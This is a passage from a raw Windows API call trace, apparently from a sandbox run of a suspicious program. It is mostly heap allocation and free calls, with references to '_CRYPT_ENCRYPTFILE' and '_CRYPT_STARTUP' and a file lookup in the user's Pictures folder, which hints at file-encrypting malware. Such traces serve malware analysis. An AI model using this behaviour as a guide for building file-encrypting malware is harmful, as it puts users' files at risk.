lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0249.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0249.306] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0249.306] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0249.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0249.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0249.306] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0249.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0249.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0249.307] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0249.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0249.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0249.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0249.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0249.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0249.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0249.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0249.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0249.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0249.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0249.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0249.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0249.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0249.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0249.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/k1wdGB_YAwU14UY.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd594b40, ftCreationTime.dwHighDateTime=0x1d5eb04, ftLastAccessTime.dwLowDateTime=0xccd26e00, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0xccd26e00, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x9006, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="k1wdGB_YAwU14UY.bmp", cAlternateFileName="K1WDGB~1.BMP")) returned 0xa87690 [0249.316] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0249.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0249.317] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.318] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0249.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0249.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: 